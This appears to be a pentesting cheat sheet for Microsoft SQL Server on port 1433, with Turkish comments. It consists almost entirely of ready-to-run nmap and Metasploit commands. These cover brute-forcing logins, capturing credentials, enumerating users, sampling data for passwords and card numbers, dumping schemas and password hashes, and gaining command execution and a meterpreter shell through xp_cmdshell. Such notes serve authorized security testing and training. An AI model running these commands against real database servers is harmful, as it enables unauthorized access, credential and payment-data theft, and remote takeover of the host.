Pentesting MSSQL - 1433

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Brute Force Login w/Msf

use auxiliary/scanner/mssql/mssql_login
set rhosts 10.10.10.10
set user_file /root/Desktop/users.txt
set verbose false
run

Connect MSSQL w/Msf

use auxiliary/admin/mssql/mssql_sql
set rhosts 10.10.10.10
set username tturhan
set password Password1
run

Enumeration

use auxiliary/admin/mssql/mssql_enum
set rhosts 10.10.10.10
set username lowpriv
set password Password1
run

Sömürebileceğimiz alanların listesini verir.

Find All Users

use auxiliary/admin/mssql/mssql_enum_sql_login
set rhosts 10.10.10.10
set username tturhan
set password Password1
run

Sistemde aktif olan tüm kullanıcıların listesini çıkarır.

Capturing Login

use auxiliary/server/capture/mssql
set srvhost 10.10.10.10
run

Bunu yazıp birinin SQL sunucusuna girmesini beklemeliyiz.

Dumping Database

use auxiliary/admin/mssql/mssql_findandsampledata
set rhosts 10.10.10.10
set username tturhan
set password Password1
set sample_size 3
set keywords Name|password|card
run

SchemaDump

use auxiliary/scanner/mssql/mssql_schemadump
set rhosts 10.10.10.10
set username tturhan
set password Password1
run

Hashdump

use auxiliary/scanner/mssql/mssql_hashdump
set rhosts 10.10.10.10
set username tturhan
set password Password1
run

Command Exceution

Xp_cmdshell

use exploit/windows/mssql/mssql_payload
set rhosts 10.10.10.10
set username tturhan
set password Password1
run

msf > auxiliary/admin/mssql/mssql_exec
msf > auxiliary/admin/mssql/mssql_sql 

Bu sayede meterpreter de bir shell alabiliriz.

Ref:

https://www.hackingarticles.in/mssql-for-pentester-metasploit/

https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/